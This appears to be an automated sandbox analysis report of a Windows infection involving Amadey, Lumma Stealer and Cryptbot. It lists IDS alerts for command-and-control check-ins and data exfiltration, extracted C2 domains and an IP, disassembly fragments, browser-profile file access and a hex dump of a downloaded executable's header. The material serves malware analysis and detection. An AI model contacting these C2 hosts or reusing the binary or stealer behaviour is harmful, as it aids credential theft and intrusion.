Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50103 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50108 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50112 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.8:50114 version: TLS 1.2

Source:	Binary string: wkernel32.pdb source: 4ec75545d6.exe, 00000007.00000003.1719929384.0000000005450000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719840913.0000000005330000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723179047.0000000000D00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723273327.0000000005160000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: 4ec75545d6.exe, 00000007.00000003.1720228406.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1720451138.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723494227.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723743224.0000000005300000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: 4ec75545d6.exe, 00000007.00000003.1718937003.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719152846.0000000005520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722506920.00000000052D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722308783.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 4ec75545d6.exe, 00000007.00000003.1719451495.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719610384.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722745520.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722951311.0000000005280000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: 4ec75545d6.exe, 00000007.00000003.1718937003.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719152846.0000000005520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722506920.00000000052D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722308783.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 4ec75545d6.exe, 00000007.00000003.1719451495.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719610384.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722745520.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722951311.0000000005280000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: 4ec75545d6.exe, 00000007.00000003.1719929384.0000000005450000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719840913.0000000005330000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723179047.0000000000D00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723273327.0000000005160000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: 4ec75545d6.exe, 00000007.00000003.1720228406.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1720451138.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723494227.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723743224.0000000005300000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_003136A9 FindFirstFileExW,	12_2_003136A9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_0031375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	12_2_0031375A
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_003136A9 FindFirstFileExW,	14_2_003136A9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 14_2_0031375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	14_2_0031375A

Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\.ms-ad\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	File opened: C:\Users\user\AppData\Local\Google\

Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_00416124
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	14_2_0043C980
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-02262853h]	14_2_0043CAD0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov ecx, eax	14_2_0040D2EA
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then lea edx, dword ptr [eax-30h]	14_2_0042B641
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov edx, dword ptr [esi+1Ch]	14_2_0042B641
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov byte ptr [ebx], al	14_2_0042BED5
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	14_2_00438EB0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0BB14481h]	14_2_0043A742
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+edx-00000090h]	14_2_0041C84E
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov word ptr [ebp+00h], cx	14_2_00427870
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	14_2_0041703C
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi]	14_2_004228D0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+esi]	14_2_00408080
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Bh]	14_2_004090A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov byte ptr [eax], cl	14_2_004090A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov edx, eax	14_2_0043C0A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	14_2_00433140
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov byte ptr [edx], cl	14_2_0041A951
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-02262853h]	14_2_0043D150
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov edx, ecx	14_2_004291C3
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov byte ptr [edi], al	14_2_004161FA
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	14_2_00417984
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov edx, eax	14_2_0043C1A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov edx, eax	14_2_0043C1BB
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov edx, eax	14_2_0043C1B9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	14_2_0040E241
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	14_2_0040E241
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+edx-00000090h]	14_2_0041C84E
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then jmp eax	14_2_004172AE
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov byte ptr [edx], cl	14_2_00409350
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	14_2_0040E35C
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	14_2_0040E35C
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	14_2_0040E35C
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then jmp dword ptr [00442784h]	14_2_0040B35D
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx+3DAAA828h]	14_2_0040B35D
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then test eax, eax	14_2_00436BA0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+6DBD87B7h]	14_2_00436BA0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_00421440
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+28h]	14_2_00407450
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	14_2_00407450
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov byte ptr [esi], al	14_2_0041AC69
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_00421C00
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h]	14_2_0042CC0E
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov ecx, eax	14_2_0040D417
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov ecx, eax	14_2_00414486
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx+6DBD87A7h]	14_2_00414486
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov edi, 00000001h	14_2_00414486
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000084h]	14_2_00415D31
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx-41h]	14_2_00415D31
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then xor ebx, ebx	14_2_00415D31
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	14_2_004295E0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov word ptr [eax], cx	14_2_00413DE2
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	14_2_00413DE2
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-02262853h]	14_2_0043CDF0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov ecx, eax	14_2_004235A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E785F9BAh	14_2_004235A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov edi, dword ptr [esp+2Ch]	14_2_004235A0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E5FE86B7h	14_2_00421E5D
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then jmp edx	14_2_00421E5D
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h]	14_2_0042C661
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx-41h]	14_2_00415E22
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h]	14_2_0042C69E
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then jmp eax	14_2_0042669F
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edi, byte ptr [edx+eax-05607F74h]	14_2_0042C6B0
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov byte ptr [edi], al	14_2_0042AF44
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	14_2_0042C748
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then jmp eax	14_2_00426751
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov edx, ecx	14_2_00428F6F
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]	14_2_00402F00
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov esi, dword ptr [esp+38h]	14_2_00427F39
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+0BB14481h]	14_2_0043A7E9
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov byte ptr [edi], al	14_2_0042AFFD
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then jmp eax	14_2_00418782
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 4x nop then mov byte ptr [edi], al	14_2_0042AFB4

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:49704 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:49707
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49709 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.8:60772 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49711 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.8:62284 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49713 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49716 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49714 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49718 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49722 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49726 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49728 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49720 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:49729 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49730 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:49732 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49802 -> 185.185.71.170:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49762 -> 185.185.71.170:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.8:49769 -> 185.185.71.170:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:50097 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.8:63160 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:50103 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:50106 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:50112 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:50096 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:50108 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:50110 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.8:50109 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:50099 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.8:50114 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:50074
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.8:50076 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.8:50094
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49717 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49717 -> 104.21.23.76:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49728 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49713 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49713 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49716 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49732 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49716 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:50103 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:50099 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:50099 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:50097 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:50097 -> 104.21.64.80:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:50114 -> 104.21.64.80:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: pancakedipyps.click
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	IPs: 185.215.113.43

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 12:38:10 GMTContent-Type: application/octet-streamContent-Length: 1943040Last-Modified: Wed, 18 Dec 2024 12:17:47 GMTConnection: keep-aliveETag: "6762bd6b-1da600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 5e 03 00 00 00 01 00 00 30 4a 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 da 48 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 56 e0 07 00 6a 00 00 00 00 c0 07 00 6c 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 e1 07 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 07 00 00 10 00 00 00 3c 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 6c 16 00 00 00 c0 07 00 00 08 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 e0 07 00 00 02 00 00 00 54 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 29 00 00 f0 07 00 00 02 00 00 00 56 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 62 7a 63 6a 6f 64 6f 00 30 19 00 00 f0 30 00 00 28 19 00 00 58 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 72 6c 67 70 64 74 6a 00 10 00 00 00 20 4a 00 00 04 00 00 00 80 1d 00 00 00 00 